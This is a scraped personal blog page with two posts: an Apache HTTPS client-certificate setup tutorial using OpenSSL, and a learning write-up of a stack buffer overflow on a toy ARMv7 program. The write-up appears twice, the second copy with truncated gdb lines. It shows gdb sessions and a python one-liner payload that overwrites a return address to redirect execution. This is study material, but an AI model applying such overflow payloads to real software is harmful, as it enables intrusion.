I think SSL/TLS should be part of security hardening process. Only fools would not use cryptography technology in post-prism era. I think what Mr Snowden did, that was proved one thing: Richard Stallman and Phrack guys( I prefer use the term "philosophical anarchist") never lie to us;-) Well, I don't wanna bullshit anything about this controversial topic here...let's see how we can set up a HTTPS server with client auth.
Generate CA certificates:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp /usr/lib/ssl/misc/CA.sh .
root@d6-test:/opt/ssl# ./CA.sh -newca
CA certificate filename (or enter to create)
Making CA certificate ...
Generating a 2048 bit RSA private key
..................................+++
..............................................+++
writing new private key to './demoCA/private/./cakey.pem'
.............................................
.............................................
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/./cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5a
Validity
Not Before: Nov 19 02:08:14 2013 GMT
Not After : Nov 18 02:08:14 2016 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-shit.com
X509v3 extensions:
X509v3 Subject Key Identifier:
D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Basic Constraints:
CA:TRUE
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Copy intermediate key and certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp demoCA/private/cakey.pem ca.key
root@d6-test:/opt/ssl#
root@d6-test:/opt/ssl# cp demoCA/cacert.pem ca.crt
--------------------------------------------------------------------------------
Generate server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out server.key 2048
Generating RSA private key, 2048 bit long modulus
...+++
.................+++
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:
--------------------------------------------------------------------------------
Generate server CSR(Certificate Signing Request) with server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key server.key -out server.csr
...........................................
........................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
--------------------------------------------------------------------------------
Genrate server certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt
Enter pass phrase for server.key
--------------------------------------------------------------------------------
You can check out the cert or verify it:
openssl x509 -noout -text -in server.crt
openssl verify -CAfile ca.crt server.crt
Generate client's key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out client.key 2048
Generating RSA private key, 2048 bit long modulus
..........................................................................................................................................+++
........+++
e is 65537 (0x10001)
Enter pass phrase for client.key:
Verifying - Enter pass phrase for client.key:
--------------------------------------------------------------------------------
Client's CSR:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key client.key -out client.csr
.......................................................
..............................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-info.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Generate client's certificate with CA certificate's signature:
root@d6-test:/opt/ssl# openssl ca -in client.csr -out client.crt
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5c
Validity
Not Before: Nov 19 02:28:13 2013 GMT
Not After : Nov 19 02:28:13 2014 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-info.com
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)
Sign the certificate? [y/n]:y
1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Convert to pkcs12 format, which can be identified by firefox:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx
Enter pass phrase for client.key:
Enter Export Password:
Verifying - Enter Export Password:
--------------------------------------------------------------------------------
Enable SSL/TLS support in Apache2:
--------------------------------------------------------------------------------
root@hardened-shit:/opt# mv ssl /etc/ssl/hardened-shit
root@hardened-shit:/etc/apache2# a2ensite default-ssl
Enabling site default-ssl.
To activate the new configuration, you need to run:
service apache2 reload
root@hardened-shit:/etc/apache2# a2enmod ssl
Module ssl already enabled
edit /etc/apache2/sites-enabled/default-ssl:
SSLCertificateFile /etc/ssl/hardened-shit/server.crt
SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key
SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt
SSLCACertificatePath /etc/ssl/hardened-shit/
SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt
SSLVerifyClient require
SSLVerifyDepth 10
Disable port 80:
root@hardened-shit:/etc/apache2# a2dissite default
--------------------------------------------------------------------------------
Done....it should works.
btw: I highly recommend you to read these two articles if you want to know further: Hardening Your Web Server's SSL Ciphers, and TLS Perfect Forward Secrecy support with Apache
I only enable the secure ciphers:
SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5
SSLProtocol +TLSv1.2 +TLSv1.1
Wednesday, November 27, 2013
Thursday, November 21, 2013
Hello, stack bufferoverflow on Debian ARMv7
I haven't make my hands *dirty* for a long time since I stopped on io-wargame lvl11. As we all know that ARM architectures are becoming sec guys's daily bread. I think it's time to begin my journey to explore what's the diff between ARMv7 and x86/x64 out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this great article to install a Debian GNU/Linux for ARMv7( armhf) distro. After the installation, you probably want to config a NAT network between host and qemu guest. Or just use my network config.
To figure out the memory layout is a good starting point. Take a glance at the code at 1st, plz.....
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x00008448 <+0>: push {r7, lr}
0x0000844a <+2>: sub sp, #8
0x0000844c <+4>: add r7, sp, #0
0x0000844e <+6>: str r0, [r7, #4]
0x00008450 <+8>: str r1, [r7, #0]
0x00008452 <+10>: movw r3, #34040 ; 0x84f8
0x00008456 <+14>: movt r3, #0
0x0000845a <+18>: mov r0, r3
0x0000845c <+20>: movw r1, #33797 ; 0x8405
0x00008460 <+24>: movt r1, #0
0x00008464 <+28>: movw r2, #33845 ; 0x8435
0x00008468 <+32>: movt r2, #0
0x0000846c <+36>: blx 0x8340
0x00008470 <+40>: ldr r3, [r7, #0]
0x00008472 <+42>: add.w r3, r3, #4
0x00008476 <+46>: ldr r3, [r3, #0]
0x00008478 <+48>: mov r0, r3
0x0000847a <+50>: bl 0x8404
0x0000847e <+54>: mov.w r3, #0 ==> 0x0000847e should be the return address of test()
0x00008482 <+58>: mov r0, r3
0x00008484 <+60>: add.w r7, r7, #8
0x00008488 <+64>: mov sp, r7
0x0000848a <+66>: pop {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
0x00008434 <+0>: push {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
0x00008436 <+2>: add r7, sp, #0
0x00008438 <+4>: movw r0, #34024 ; 0x84e8
0x0000843c <+8>: movt r0, #0
0x00008440 <+12>: blx 0x8358
0x00008444 <+16>: pop {r7, pc}
End of assembler dump.
Let's check the memory layout:
(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11 strcpy(buf, input);
(gdb) n
12 printf("%s \n", buf);
(gdb)
AAAABBBB
13 }
(gdb) x/12x $sp
0x7efff658: 0x00000000 0x7efff919 0x000084f8 0x41414141
0x7efff668: 0x42424242 0x00008400 0x7efff678 0x0000847f==> ret addr of test()
0x7efff678: 0x7efff7d4 0x00000002 0x00000000 0x76f12cfb
So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]
Why the hell the addr of 0x0000847e we saw above now became 0x0000847f. Weird...Anyone know about what happened?
OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A', "4\204") at victim.c:11
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�
Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17 printf("being hacked\n");
(gdb) n
Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.
Did you see this? +1 with the fuc_me()'s addr, plz.....
(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A', "5\204") at victim.c:11
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked
Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=) at victim.c:13
13 }
It worked! So, the exp should be like:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault
===========================
I guess the exploit of ARM would be much different to x86. I've heard of ret2libc won't work on ARM. That's really interesting and worth to figure it out. Obviously, this Phrack paper and some manuals should be added into my must-read list.
To figure out the memory layout is a good starting point. Take a glance at the code at 1st, plz.....
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x00008448 <+0>: push {r7, lr}
0x0000844a <+2>: sub sp, #8
0x0000844c <+4>: add r7, sp, #0
0x0000844e <+6>: str r0, [r7, #4]
0x00008450 <+8>: str r1, [r7, #0]
0x00008452 <+10>: movw r3, #34040 ; 0x84f8
0x00008456 <+14>: movt r3, #0
0x0000845a <+18>: mov r0, r3
0x0000845c <+20>: movw r1, #33797 ; 0x8405
0x00008460 <+24>: movt r1, #0
0x00008464 <+28>: movw r2, #33845 ; 0x8435
0x00008468 <+32>: movt r2, #0
0x0000846c <+36>: blx 0x8340
0x00008470 <+40>: ldr r3, [r7, #0]
0x00008472 <+42>: add.w r3, r3, #4
0x00008476 <+46>: ldr r3, [r3, #0]
0x00008478 <+48>: mov r0, r3
0x0000847a <+50>: bl 0x8404
0x0000847e <+54>: mov.w r3, #0 ==> 0x0000847e should be the return address of test()
0x00008482 <+58>: mov r0, r3
0x00008484 <+60>: add.w r7, r7, #8
0x00008488 <+64>: mov sp, r7
0x0000848a <+66>: pop {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
0x00008434 <+0>: push {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
0x00008436 <+2>: add r7, sp, #0
0x00008438 <+4>: movw r0, #34024 ; 0x84e8
0x0000843c <+8>: movt r0, #0
0x00008440 <+12>: blx 0x8358
0x00008444 <+16>: pop {r7, pc}
End of assembler dump.
Let's check the memory layout:
(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11 strcpy(buf, input);
(gdb) n
12 printf("%s \n", buf);
(gdb)
AAAABBBB
13 }
(gdb) x/12x $sp
0x7efff658: 0x00000000 0x7efff919 0x000084f8 0x41414141
0x7efff668: 0x42424242 0x00008400 0x7efff678 0x0000847f==> ret addr of test()
0x7efff678: 0x7efff7d4 0x00000002 0x00000000 0x76f12cfb
So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]
Why the hell the addr of 0x0000847e we saw above now became 0x0000847f. Weird...Anyone know about what happened?
OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A'
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�
Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17 printf("being hacked\n");
(gdb) n
Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.
Did you see this? +1 with the fuc_me()'s addr, plz.....
(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A'
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked
Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=
13 }
It worked! So, the exp should be like:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault
===========================
I guess the exploit of ARM would be much different to x86. I've heard of ret2libc won't work on ARM. That's really interesting and worth to figure it out. Obviously, this Phrack paper and some manuals should be added into my must-read list.
Subscribe to:
Posts (Atom)